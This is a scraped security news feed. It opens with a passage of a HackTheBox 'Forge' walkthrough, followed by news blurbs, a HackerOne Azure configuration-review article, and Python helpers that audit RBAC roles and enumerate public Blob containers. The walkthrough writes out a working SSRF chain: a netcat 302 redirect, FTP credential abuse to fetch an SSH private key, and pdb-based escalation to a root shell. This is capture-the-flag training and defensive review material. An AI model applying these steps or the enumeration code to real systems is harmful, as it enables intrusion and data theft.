We see that the endpoint admin.forge.htb is not accessible at all and there is nothing we can do with it directly. But remember we have an option to upload from a URL on forge.htb; let’s use this functionality and see if we can do something. We tried redirecting to admin.forge.htb and changed its case to bypass filters, like AdMiN.fOrGe.hTb, but nothing works. Let’s take a pause, touch some grass, and get back to hacking. Now that we are stuck, we take a look at the hint and ponder what we can do. Hmm, we should answer the request with a 302 redirect. We can do that with netcat. Let’s write a response that redirects to the endpoint we are trying to reach, admin.forge.htb:

HTTP/1.1 302 Found
Location: http://admin.forge.htb/

Save this file as http.req and start our listener.

└──╼ [★]$ sudo nc -nlvp 8000 < http.req

First click the option to upload from URL, then enter the address of our host that netcat is listening on and press the Submit button; you should get a URL. Once you get the request on your netcat listener, hit Ctrl+C to stop the process, and you should get the URL for the file you have uploaded. Visit the URL via curl to get our answer for this task.

Answer: Welcome Admins!

Task 6: What is the password for the user user on the FTP server?

Let’s ponder over the previous task: we got the admin dashboard, but it also has an /announcements page. So let’s repeat the previous task, this time to get the /announcements section on the admin subdomain.

STEP 1: Create an http.req that redirects to the desired target.

HTTP/1.1 302 Found
Location: http://admin.forge.htb/announcements

STEP 2: Start the netcat listener.

sudo nc -nlvp 8000 < http.req

STEP 3: Visit the endpoint, and in the upload-from-URL option enter your host’s IP address with the right port number to perform the RFI (Remote File Inclusion) attack. First click the option to upload from URL, then enter the address of our host that netcat is listening on and press the Submit button; you should get a URL. Once you get the request on your netcat listener, hit Ctrl+C to stop the process, and you should get the URL for the file you have uploaded. Now let’s curl that URL and see what we got.

└──╼ [★]$ curl http://forge.htb/uploads/uhIkIHlvObStiy3Lujrv
<!DOCTYPE html>
<html>
<head>
    <title>Announcements</title>
</head>
<body>
    <link rel="stylesheet" type="text/css" href="/static/css/main.css">
    <link rel="stylesheet" type="text/css" href="/static/css/announcements.css">
    <header>
        <nav>
            <h1 class=""><a href="/">Portal home</a></h1>
            <h1 class="align-right margin-right"><a href="/announcements">Announcements</a></h1>
            <h1 class="align-right"><a href="/upload">Upload image</a></h1>
        </nav>
    </header>
    <br><br><br>
    <ul>
        <li>An internal ftp server has been setup with credentials as user:heightofsecurity123!</li>
        <li>The /upload endpoint now supports ftp, ftps, http and https protocols for uploading from url.</li>
        <li>The /upload endpoint has been configured for easy scripting of uploads, and for uploading an image, one can simply pass a url with ?u=<url>.</li>
    </ul>
</body>
</html>

Answer: heightofsecurity123!

Task 7: What is the HTTP GET parameter on admin.forge.htb/upload for passing a URL that handles the FTP protocol?

Let’s look carefully at /announcements on admin.forge.htb. We clearly see which method can be used, since the announcements mention adding something to the URL, which is nothing but ?u=<url> (if something is added to the URL, it’s most likely a GET request).

Answer: u

Task 8: Submit the flag located in the user user’s home directory.

As in the previous step, let’s redo all the steps, but this time we change the http.req file.

HTTP/1.1 302 Found
Location: http://admin.forge.htb/upload?u=ftp://user:heightofsecurity123!@127.0.0.1/

We redo the four steps (start the listener, make a request to our netcat, stop netcat, and curl the file upload URL) and we get the following listing.

└──╼ [★]$ curl http://forge.htb/uploads/xvyJ4ZoiP9jpJYAlzUJS
drwxr-xr-x    3 1000     1000         4096 Aug 04  2021 snap
-rw-r-----    1 0        1000           33 Dec 13 15:18 user.txt

So let’s add user.txt to the end of the location, and our new http.req should look like this.

HTTP/1.1 302 Found
Location: http://admin.forge.htb/upload?u=ftp://user:heightofsecurity123!@127.0.0.1/user.txt

Now if we redo the steps from the previous tasks we should get user.txt. To get into the machine let’s try SSH: change http.req to the following and redo the steps.

HTTP/1.1 302 Found
Location: http://admin.forge.htb/upload?u=ftp://user:heightofsecurity123!@127.0.0.1/.ssh/id_rsa

A little research into how an FTP request can be made through an HTTP request won’t hurt, I guess. Now that we have the id_rsa file, let’s restrict its permissions and, having found the flag in user.txt, SSH into the account of user.

chmod 600 id_rsa
ssh user@10.129.187.4 -i id_rsa

Task 9: What is the full path to the script that the user user can run as root without a password?

We will be using the classic sudo -l command to figure out the answer for this task.

user@forge:~$ sudo -l
Matching Defaults entries for user on forge:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User user may run the following commands on forge:
    (ALL : ALL) NOPASSWD: /usr/bin/python3 /opt/remote-manage.py

Answer: /opt/remote-manage.py

Task 10: What is the imported Python module that, if invoked, will drop to an interactive debugging session?

To answer this task, let’s analyze the Python code present inside /opt/remote-manage.py.

#!/usr/bin/env python3
import socket
import random
import subprocess
import pdb

port = random.randint(1025, 65535)

try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(('127.0.0.1', port))
    sock.listen(1)
    print(f'Listening on localhost:{port}')
    (clientsock, addr) = sock.accept()
    clientsock.send(b'Enter the secret passsword: ')
    if clientsock.recv(1024).strip().decode() != 'secretadminpassword':
        clientsock.send(b'Wrong password!\n')
    else:
        clientsock.send(b'Welcome admin!\n')
        while True:
            clientsock.send(b'\nWhat do you wanna do: \n')
            clientsock.send(b'[1] View processes\n')
            clientsock.send(b'[2] View free memory\n')
            clientsock.send(b'[3] View listening sockets\n')
            clientsock.send(b'[4] Quit\n')
            option = int(clientsock.recv(1024).strip())
            if option == 1:
                clientsock.send(subprocess.getoutput('ps aux').encode())
            elif option == 2:
                clientsock.send(subprocess.getoutput('df').encode())
            elif option == 3:
                clientsock.send(subprocess.getoutput('ss -lnt').encode())
            elif option == 4:
                clientsock.send(b'Bye\n')
                break
except Exception as e:
    print(e)
    pdb.post_mortem(e.__traceback__)
finally:
    quit()

What the code does: This Python script sets up a local TCP server on a random port that prompts a connected client for a password and provides a menu-driven interface to execute system commands for viewing processes, free memory, and listening sockets, and to quit.

Important parts of the code: The key components are the socket setup for TCP communication (socket.socket and sock.listen), the password validation logic, the use of subprocess.getoutput to execute system commands based on user input, and the error handling with pdb.post_mortem.

Interactive debugging module: The imported Python module for interactive debugging is pdb.

Answer: pdb

Let’s make a note of the password from the Python script, which is secretadminpassword.

Task 11: Submit the flag located in the root user’s home directory.

For this task we will need two terminals: one for running the script and another for connecting back and running the debugger. Before we proceed, let’s make sure we have a second terminal open with an SSH connection to the same host, using the command ssh user@10.129.187.4 -i id_rsa. In your first terminal, run the program with sudo using the following command.

user@forge:~$ sudo python3 /opt/remote-manage.py
Listening on localhost:56863

Now in the other terminal, which has the second SSH connection, connect with netcat to the same port and enter the password.

user@forge:~$ nc localhost 56863
Enter the secret passsword: secretadminpassword
Welcome admin!

It will now prompt you with four options; you have to type in any non-numeric input to trigger the pdb debugger. In my example I have typed abcd.

user@forge:~$ nc localhost 56863
Enter the secret passsword: secretadminpassword
Welcome admin!

What do you wanna do:
[1] View processes
[2] View free memory
[3] View listening sockets
[4] Quit
abcd

Now switch back to the first terminal: pdb should be active. Type in the following command to elevate privileges.

(Pdb) import os; os.system('/bin/bash');
root@forge:/home/user#

Now it’s time to get the root flag, and we have solved this machine.

root@forge:/home/user# cat /root/root.txt

by HACKLIDO

Krispy Kreme, the doughnut giant, revealed on Wednesday that its online ordering systems in the US had been hit by a cyberattack. In a regulatory filing, Krispy Kreme disclosed that upon discovering an intruder in their systems on November 29th, they promptly initiated measures to secure their networks with the assistance of cybersecurity specialists. Since […] The post Do(ug)h! Krispy Kreme Suffers Cyberattack appeared first on IT Security Guru.

by IT Security Guru

We went hands-on with Keeper's password manager, and found that it takes security seriously, using leading encryption technology to protect your sensitive data.

by ZDNET Security

A new report makes it clear that U.K. organizations need to do more security awareness training to ensure their employees don’t fall victim to the evolving use of AI.

by KnowBe4

A widespread phishing campaign is attempting to steal credentials from employees working at dozens of organizations around the world, according to researchers at Group-IB.

by KnowBe4

Iran-affiliated threat actors have been linked to a new custom malware that's geared toward IoT and operational technology (OT) environments in Israel and the United States. The malware has been codenamed IOCONTROL by OT cybersecurity company Claroty, highlighting its ability to attack IoT and supervisory control and data acquisition (SCADA) devices such as IP cameras, routers, programmable

by The Hacker News

Run by the team at orchestration, AI, and automation platform Tines, the Tines library contains pre-built workflows shared by real security practitioners from across the community, all of which are free to import and deploy via the Community Edition of the platform.  Their bi-annual “You Did What with Tines?!” competition highlights some of the most interesting workflows submitted by their

by The Hacker News

2024-12-13 16:39:00

The best VPN routers of 2024

Looking for a router that can provide full VPN coverage at home? These are the best routers that support VPN installation or include pre-installed VPNs.

by ZDNET Security

Care1, a Canadian healthcare solutions provider left a cloud storage instance freely accessible and unencrypted for anyone to find.

by Malwarebytes Labs

Small, easily weaponizable drones have become a feature of battlefields from the Middle East to Ukraine. Now the threat looms over the US homeland, and the Pentagon's ability to respond is limited.

by WIRED Security News

As the adoption of LCNC grows, so will the complexity of the threats organizations face.

by Dark Reading

Implementing Privacy by Design principles in decentralized identity systems helps safeguard user data, comply with regulations, and build trust in digital ecosystems centered on privacy.

by ITPro Today

Cybersecurity researchers have uncovered a new Linux rootkit called PUMAKIT that comes with capabilities to escalate privileges, hide files and directories, and conceal itself from system tools, while simultaneously evading detection. "PUMAKIT is a sophisticated loadable kernel module (LKM) rootkit that employs advanced stealth mechanisms to hide its presence and maintain communication with

by The Hacker News

The market for embedded computing has been growing constantly, and this trend is expected to continue in the near future. Notably, embedded systems are key components of the Internet of Things (IoT) and of Cyber-Physical Systems (CPSs). In the embedded software industry, secure software development is critical, especially because embedded software often serves vital industries such as medical devices or automotive solutions. When we're talking about medical emergencies or transport, software failures can literally become a matter of life and death. Additionally, the growing complexity of embedded software can come with security costs if you don't apply the right testing procedures. Software development models, such as the V-Model, play a crucial role in ensuring software quality and security.

This blog will explain how fuzz testing can improve testing efficiency within the V-Model methodology. It will dive into the principles of fuzz testing and its impact at the different stages of the V-Model testing process.

Contents
- What is V-model testing?
- V-model testing and embedded software: the testing stages
- How does fuzz testing help in each testing stage?
- Discover Code Intelligence and Fuzz Testing

by Code Intelligence

December is a month of numbers, from holiday countdowns to RSVPs for parties. But for business leaders, the most important numbers this month are the budget numbers for 2025. With cybersecurity a top focus for many businesses in 2025, it is likely to be a top-line item on many budgets heading into the New Year. […] The post Making smart cybersecurity spending decisions in 2025 appeared first on Security Intelligence.

by Security Intelligence

AI risks arise not from AI acting on its own, but because of what people do with it.

by WIRED Security News

Azure Cloud Configuration Review
Paul De Baldo V, Fri, 12/13/2024 - 10:44

Testing Methodologies

HackerOne's Microsoft Azure testing methodologies are grounded in the principles of the PTES, the CIS Microsoft Azure Benchmarks, and the pillars of the Azure Well-Architected Framework. Additionally, our testing processes adhere to the standards required for CREST certification/accreditation, ensuring comprehensive and reliable assessments across various cloud environments, including Microsoft Azure. Organizations can now better protect against risk and attacks with highly skilled experts who have specialized, proven expertise in vulnerabilities specific to the products and services in your Azure cloud environment.

Common Vulnerabilities

Microsoft Azure operates under a Shared Responsibility Model that divides security responsibilities between Microsoft and its customers. Where the line falls depends on the deployment type: Software as a Service (SaaS), Platform as a Service (PaaS), or Infrastructure as a Service (IaaS). With any deployment, though, customers are responsible for the security of their data, devices, and accounts. With the vast number of possible combinations of Azure services and their configurations, it is easy to overlook vulnerabilities that arise from misconfigurations.

Entra ID Misconfigurations

Entra ID (formerly Azure Active Directory) is the Identity and Access Management (IAM) service for Microsoft's cloud environments. Users in Entra ID can be both internal and external to your organization. If guest accounts are not audited regularly, guest credentials can outlive their purpose and remain a possible entry point for compromise. Further IAM misconfigurations can occur as well.

Outside of the cloud, on-premises Active Directory (AD) runs on servers known as Domain Controllers (DCs). Each DC holds the directory of entities authorized to access network resources, and users authenticate with the Kerberos or NTLM protocols. Self-hosted AD can be synchronized to Entra ID using Entra Connect Sync; this on-premises and cloud combination is referred to as a hybrid deployment. If your organization uses pass-through authentication or federation in a hybrid model, leaked (publicly exposed) passwords are reported only if the password hash synchronization feature is explicitly enabled as well.

Multi-factor authentication (MFA) must also be enabled, as the default configuration does not enforce it. This should apply to the Service Management API and to all user accounts.

Additionally, there are two group types within Entra ID: Security and Microsoft 365 (M365). The creation of these groups should be restricted to administrators only. Groups let you organize users within your cloud environment by department and give them access to shared resources, but by default a newly created M365 group is public, which can lead to users sharing sensitive information with a wider audience than intended.

It is vital to secure the connected IAM systems in both Azure and on-premises to prevent attackers from exploiting a misconfiguration in one to pivot into the other. Security is only as strong as the weakest link.

Microsoft RBAC Misconfigurations

Managing who has access to Azure resources, what actions they can take against them, and which parts of the cloud they can reach is done through Role-Based Access Control (RBAC). By assigning a role to a user, group, or service, fine-grained access control can be implemented. A role assignment consists of three elements: a security principal, a role definition, and a scope. The security principal identifies the entity to which a collection of permissions, the role definition, applies. Once a role definition is assigned to a security principal, the scope defines the resources and services that may be accessed.

While several built-in roles are provided, misconfigurations can arise when creating custom roles. For example, a wildcard (*) in Actions grants every operation that can be executed on a resource. Unless NotActions explicitly lists the operations that must not be permitted, a wildcard can lead to unauthorized access to sensitive data and functionality.

Virtual Network Misconfigurations

Virtual Networks partition your organization's hosts through subnetting. To ensure members of your organization only reach the portions of the network their duties require, network security groups (NSGs) with stringent rules must be implemented, and the creation of these groups should be restricted to administrators only.

Misconfigured NSG rules can lead to unauthorized access to hosts and services. Rules are built from multiple parameters: source, destination, protocol, traffic direction, port or port range, and priority. Even when rules exist, the number of possible parameter combinations makes access oversights easy.

Rules are processed in priority order, and processing stops at the first match, so the intended rule may never be enforced if its priority is misconfigured. Modifying or removing rules only affects subsequent connections; existing connections are not re-evaluated, so users who no longer meet the updated criteria keep the access they already hold for as long as their connection lasts. Misconfigurations in route tables and forced-tunneling settings can also lead to unapproved network access, and attackers can exploit them to reach any Azure resource on that network segment.

App Service Misconfigurations

Azure App Service is a Platform-as-a-Service (PaaS) for building, deploying, and scaling web applications and APIs. Authentication for this service is disabled by default on new web applications, allowing anonymous access. Once enabled, the built-in authentication feature enforces authentication on every HTTP request before it reaches the application code. Because anonymous access by default is insecure, additional configuration hardening is required.

Azure Function Apps default to public access but can be restricted to Azure Virtual Networks (VNets). Unless absolutely necessary, public access should be removed in favor of private endpoints. Functions should require access keys and should not run under accounts with administrative privileges; restrict and harden access in line with the principle of least privilege.

Azure Web Apps accept both HTTP and HTTPS, with plain HTTP allowed by default. All traffic should be redirected to HTTPS to ensure encrypted communication.

Advisor Misconfigurations

The Azure Advisor service provides detailed, actionable recommendations that can improve the security of your organization's cloud environment. By default, all recommendations are enabled, but with the appropriate permissions they can be excluded per subscription or resource, and postponed or dismissed on a single resource. Dismissed recommendations are not shown again unless manually reactivated. Forgotten recommendations that were dismissed or disabled entirely can leave you unaware of critical security issues and your environment open to exploitation.

Activity Log Misconfigurations

Azure Monitor collects and aggregates data from every area and resource across your Azure environment. Its Activity Log keeps an audit trail of the control-plane events in the environment, which is crucial for threat monitoring and incident response. Make sure alerts for critical events such as "Delete PostgreSQL Database" are enabled so that significant changes to your environment are noticed immediately.

Virtual Machine Misconfigurations

Virtual Machines (VMs) are scalable compute resources that run applications and workloads in the Azure cloud. Missing or misconfigured rules such as "install approved extensions only" and "enable automatic OS upgrades" can lead to vulnerabilities. Since extensions run with administrator privileges, a vulnerable extension can result in privilege escalation and remote code execution, and an outdated operating system carries known vulnerabilities waiting to be exploited. VMs should also use managed disks encrypted with a managed key; this applies to unattached disks in the subscription as well.

Blob Storage Misconfigurations

Microsoft Azure offers several storage services. Blob Storage holds massive amounts of unstructured data, such as text and binary data, on a network of remote servers. By default, uploaded files are private, but improper access configuration can expose sensitive data.

In Azure, the unique namespace for your data is the storage account. Within an account, blobs are organized in containers, much as files are stored in directories, and every blob is reachable through a URL of the same form:

https://[storage-account].blob.core.windows.net/[container-name]/[blob-name]

Since the storage account name is the only dynamic part of the hostname, any container unintentionally set to the "Public read access for container and its blobs" access level can be enumerated easily and its contents read. A dictionary attack is not very effective at guessing blob names unless they are generic, but it is not needed: a List Blobs call, which is a GET request to

https://[storage-account].blob.core.windows.net/[container-name]?restype=container&comp=list

enumerates every blob in a publicly listable container. Where such a container was supposed to be protected, this leads to unauthorized access to critical data. Vulnerabilities can also arise when the "enable immutable blob storage" rule is absent; immutability policies keep critical data in a state where it cannot be modified or deleted for a specified period.

Azure Database Service Misconfigurations

Azure offers a number of database options for storing data in the cloud. Encryption at rest and in transit is vital to keep sensitive data from being accessed or intercepted by unauthorized third parties, and robust auditing and logging let your organization quickly identify and respond to potential data theft. As a best practice, separate accounts should be used for database access, which limits the damage a single compromised account can do. The principle of least privilege and a zero-trust model should be the foundations for deciding who can access your organization's database services. A defense-in-depth approach lets you iteratively harden against data breaches through firewalls at multiple levels, access management policies, encryption, regular auditing, and threat detection tooling.

Azure Key Vault Misconfigurations

Secure storage of, and access to, secrets within your Azure environment is provided by Azure Key Vault. Proper vault-specific RBAC and separation of key vaults are vital to limiting secret access to those who hold the required permissions and need them. Accounts that do hold these permissions should have MFA enabled, as their privileged roles pose a greater risk if compromised. Without soft-delete and purge protection, data could be permanently lost if a threat actor gained access to one of these accounts.

Automatic key rotation should be enabled in your organization's key policy. Rotation renews a key at configured intervals, which limits the useful lifetime of any key material held by members whose access has been revoked or who have left the organization.

Key vaults should only accept connections through private endpoints; exposing vaults publicly increases your organization's attack surface. It is also crucial to enable logging on key vaults so that suspicious access can be assessed and response processes triggered.

Azure Defender Misconfigurations

Defender is a cloud-native application protection platform (CNAPP) that provides a suite of security measures and practices. Designed to improve your organization's security posture, Defender helps identify vulnerabilities across your entire attack surface. It should be enabled for all of your organization's resources and services, including those on-premises and on other cloud providers: it can only harden assets it knows about. Defender provides security recommendations to remediate the gaps it identifies, for example alerting you to software updates that should be applied to virtual machines. Misconfigured exemptions to these recommendations can leave assets in a vulnerable state.

Azure Configuration Review Best Practices

Careful Scoping

Having the right scope is crucial to a successful pentest; what is being tested can be just as important as how it is being tested. An Azure environment can be vast, with resources and services distributed throughout. By strategically selecting targets within your cloud environment, you can ensure quality time is dedicated to your most critical cloud assets. This curation can mean the difference between an inconsequential configuration review and a valuable one that discovers high-impact vulnerabilities. HackerOne assesses your assets to provide guidance on which ones to include and delivers a quote tailored to your specific requirements.

Skills-Based Tester Matching

Traditional consultancies often rely on in-house pentesters with general skills. Azure pentesting, however, requires specialized knowledge of the environment and of cloud security practices. With HackerOne Pentest, delivered via a Pentest as a Service (PTaaS) model, customers gain access to a diverse pool of elite, vetted security researchers who bring a wide range of skills, certifications, and experience specific to Microsoft Azure. The HackerOne platform keeps track of each researcher's skill set based on their track record and matches the most suitable researchers to each engagement. The community-driven PTaaS approach delivers comprehensive coverage, versatility, and high-quality results tailored to the services in your Azure environments.

Case Study: Microsoft's Own Misconfiguration

In October 2022, Microsoft confirmed that an Azure Blob Storage container holding 2.4 terabytes of sensitive data had been left exposed by a misconfiguration. Over 300,000 emails, 133,000 projects, and information on 548,000 users belonging to 65,000 companies were publicly accessible, including invoices, intellectual property, and internal comments.

Source: Misconfigured Server Storage discovered by SOCRadar Cloud Security Module

The misconfigured storage was owned and maintained by Microsoft itself, and the company only became aware of the issue after being notified by threat intelligence provider SOCRadar. Microsoft resolved the issue by reconfiguring the storage to private. Although there was no indication of unauthorized access, it was a matter of luck that threat actors did not find and access the exposed storage first.

Why HackerOne PTaaS Is the Best Option for Azure Cloud Review

By choosing HackerOne as your partner in pentesting, your organization can fully benefit from the community-driven pentest-as-a-service (PTaaS) model that provides unmatched expertise and resources for Azure security configuration pentests. The HackerOne platform streamlines the entire pentest process to deliver the greatest return on investment in risk reduction. By leveraging the people and the technology, your organization gains the following advantages:

- Comprehensive Azure Security Configuration Reviews: access pentesters with deep expertise in auditing and improving Azure cloud configurations to secure your cloud infrastructure against vulnerabilities.
- Efficient Program Initiation: rapid program setup with direct communication channels to testers, ensuring on-demand delivery of findings.
- Streamlined Pentest Management: use the HackerOne Platform for pentest management, including a bi-directional Azure DevOps integration that aligns development and security teams and reduces manual back-and-forth, for a streamlined vulnerability remediation workflow.
- Extended Attack Surface Coverage: our diverse community of security researchers excels at uncovering misconfigurations and vulnerabilities unique to Azure environments, enabling comprehensive security audits without switching vendors.

Contact the HackerOne team today to get started!
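As an added example for the RBAC section above (my code, not HackerOne's tooling or anything Microsoft publishes), the following audits an exported custom role definition for the wildcard problem described there: it applies Azure's Actions-minus-NotActions semantics and flags a bare "*", any permitted action that allows self-escalation, and assignability at the tenant root. The three role definitions are constructed for the example; the field names follow the JSON that "az role definition list" returns, and the list of sensitive actions is a chosen illustration, not an exhaustive catalogue.

```python
import re

# Control-plane actions a custom role should rarely grant: the first two
# let a principal change who has what rights, the others run code or
# reconfigure secrets (selection made for this example).
SENSITIVE_ACTIONS = (
    "Microsoft.Authorization/roleAssignments/write",
    "Microsoft.Authorization/roleDefinitions/write",
    "Microsoft.Compute/virtualMachines/runCommand/action",
    "Microsoft.KeyVault/vaults/write",
)


def action_matches(pattern: str, action: str) -> bool:
    """Azure RBAC wildcard semantics: '*' matches any run of characters,
    '/' included, so 'Microsoft.Compute/*' covers every nested operation;
    the comparison is case-insensitive."""
    regex = ".*".join(re.escape(part) for part in pattern.split("*"))
    return re.fullmatch(regex, action, re.IGNORECASE) is not None


def permits(role: dict, action: str) -> bool:
    """Effective control-plane permission = Actions minus NotActions."""
    allowed = any(action_matches(p, action) for p in role.get("Actions", []))
    denied = any(action_matches(p, action) for p in role.get("NotActions", []))
    return allowed and not denied


def audit_custom_role(role: dict) -> list:
    """Return human-readable findings for one role definition."""
    findings = []
    actions = role.get("Actions", [])
    not_actions = role.get("NotActions", [])
    if "*" in actions:
        if not_actions:
            findings.append("bare '*' in Actions: effective rights are "
                            "everything except NotActions, review that list")
        else:
            findings.append("bare '*' in Actions with no NotActions: full "
                            "control-plane rights on every resource in scope")
    for act in SENSITIVE_ACTIONS:
        if permits(role, act):
            findings.append(f"permits {act}")
    if "/" in role.get("AssignableScopes", []):
        findings.append("assignable at the root scope '/'")
    return findings


# Constructed role definitions (subscription ID is a placeholder).
_SCOPE = ["/subscriptions/00000000-0000-0000-0000-000000000000"]

RISKY_ROLE = {  # the wildcard mistake from the text
    "Name": "VM Operator (example)", "IsCustom": True,
    "Actions": ["*"], "NotActions": [], "AssignableScopes": _SCOPE,
}

CONTRIBUTOR_LIKE_ROLE = {  # wildcard fenced by NotActions, as built-in roles do
    "Name": "Contributor-like (example)", "IsCustom": True,
    "Actions": ["*"],
    "NotActions": ["Microsoft.Authorization/*/Write",
                   "Microsoft.Authorization/*/Delete"],
    "AssignableScopes": _SCOPE,
}

SCOPED_ROLE = {  # least-privilege version of the same intent
    "Name": "VM Operator (example, fixed)", "IsCustom": True,
    "Actions": ["Microsoft.Compute/virtualMachines/read",
                "Microsoft.Compute/virtualMachines/start/action",
                "Microsoft.Compute/virtualMachines/restart/action"],
    "NotActions": [], "AssignableScopes": _SCOPE,
}

if __name__ == "__main__":
    for role in (RISKY_ROLE, CONTRIBUTOR_LIKE_ROLE, SCOPED_ROLE):
        print(role["Name"], "->", audit_custom_role(role) or ["no findings"])
```

Run against a real export, the same functions work unchanged on each element of the JSON array from "az role definition list --custom-role-only true"; the point to notice is that the Contributor-like role still permits runCommand on VMs even though it can no longer change role assignments.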

by HackerOne
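The enumeration step from the Blob Storage section of the HackerOne article above, as an added example of mine rather than HackerOne's tooling: it builds the anonymous List Blobs URL, walks NextMarker pagination, and parses the XML the service returns, distinguishing a listable container from an <Error> response. The storage account and container names, the two XML pages, the error document and the canned_fetch stand-in for HTTP are all constructed for the example; http_get is the real transport and is not exercised offline.

```python
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET
from urllib.parse import urlencode

BLOB_HOST = "blob.core.windows.net"


def blob_url(account: str, container: str, blob: str) -> str:
    return f"https://{account}.{BLOB_HOST}/{container}/{blob}"


def list_blobs_url(account: str, container: str, marker: str = None) -> str:
    """Anonymous List Blobs: GET <container>?restype=container&comp=list.
    Only succeeds when the container access level is 'Container'; at the
    'Blob' level direct blob GETs still work but listing is refused, so a
    refused listing does not prove the blobs are private."""
    params = {"restype": "container", "comp": "list"}
    if marker:
        params["marker"] = marker
    return f"https://{account}.{BLOB_HOST}/{container}?{urlencode(params)}"


def parse_list_blobs(body: str):
    """Parse one response page into (blobs, next_marker); next_marker is
    None on the last page. Raises ValueError carrying the service error
    code when the body is an <Error> document."""
    root = ET.fromstring(body)
    if root.tag == "Error":
        raise ValueError(root.findtext("Code") or "UnknownError")
    blobs = []
    for blob in root.iterfind("./Blobs/Blob"):
        props = blob.find("Properties")
        blobs.append({
            "name": blob.findtext("Name"),
            "size": int(props.findtext("Content-Length") or 0) if props is not None else 0,
            "content_type": props.findtext("Content-Type") if props is not None else None,
        })
    return blobs, (root.findtext("NextMarker") or None)


def http_get(url: str):
    """Real transport: (status, body) for any HTTP status."""
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def enumerate_container(account: str, container: str, fetch=http_get) -> list:
    """Return every blob name in a publicly listable container, following
    NextMarker across pages; raises PermissionError otherwise."""
    names, marker = [], None
    while True:
        status, body = fetch(list_blobs_url(account, container, marker))
        if status != 200:
            try:
                code = ET.fromstring(body).findtext("Code")
            except ET.ParseError:
                code = None
            raise PermissionError(f"HTTP {status} {code or ''}".strip())
        page, marker = parse_list_blobs(body)
        names.extend(b["name"] for b in page)
        if not marker:
            return names


# Constructed responses in the shape of the List Blobs XML (not captured
# from any real account): two pages, then an error document.
_PAGE1 = """<?xml version="1.0" encoding="utf-8"?>
<EnumerationResults ServiceEndpoint="https://contoso.blob.core.windows.net/" ContainerName="backups">
<Blobs>
<Blob><Name>invoices/2022-01.pdf</Name><Properties><Content-Length>48211</Content-Length><Content-Type>application/pdf</Content-Type></Properties></Blob>
<Blob><Name>db/export.sql</Name><Properties><Content-Length>1048576</Content-Length><Content-Type>application/octet-stream</Content-Type></Properties></Blob>
</Blobs>
<NextMarker>page2</NextMarker>
</EnumerationResults>"""
_PAGE2 = """<?xml version="1.0" encoding="utf-8"?>
<EnumerationResults ServiceEndpoint="https://contoso.blob.core.windows.net/" ContainerName="backups">
<Blobs>
<Blob><Name>db/export.sql.bak</Name><Properties><Content-Length>1048576</Content-Length><Content-Type>application/octet-stream</Content-Type></Properties></Blob>
</Blobs>
<NextMarker />
</EnumerationResults>"""
_DENIED = """<?xml version="1.0" encoding="utf-8"?>
<Error><Code>PublicAccessNotPermitted</Code><Message>Public access is not permitted on this storage account.</Message></Error>"""


def canned_fetch(url: str):
    """Offline stand-in for http_get keyed on the exact URLs built above."""
    if url == list_blobs_url("contoso", "backups"):
        return 200, _PAGE1
    if url == list_blobs_url("contoso", "backups", "page2"):
        return 200, _PAGE2
    return 409, _DENIED


if __name__ == "__main__":
    print(enumerate_container("contoso", "backups", canned_fetch))
```

Pointing enumerate_container at a real account (with the default http_get) is exactly the unauthenticated probe the article describes; an authorized reviewer should run it only against in-scope accounts, and should pair it with a direct blob_url GET, because a container at the "Blob" access level passes the listing check while still serving any blob whose name is known.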

Consider critical capabilities of MDR solutions such as comprehensive protection across various platforms, seamless integration of existing technology and more.

by ReliaQuest

The U.S. Department of Justice (DoJ) on Thursday announced the shutdown of an illicit marketplace called Rydox ("rydox[.]ru" and "rydox[.]cc") for selling stolen personal information, access devices, and other tools for conducting cybercrime and fraud. In tandem, three Kosovo nationals and administrators of the service, Ardit Kutleshi, Jetmir Kutleshi, and Shpend Sokoli, have been arrested.

by The Hacker News

Cross-site request forgery, or CSRF, is a type of cybersecurity attack where a logged-in victim is tricked into an unwanted action by a malicious attacker.

by ThreatDown

SophosAI’s framework for upgrading the performance of LLMs for cybersecurity tasks (or any other specific task) is now open source.

by Sophos News

Introduction OilRig: Unveiling the Advanced Tactics of APT34

by Picus Security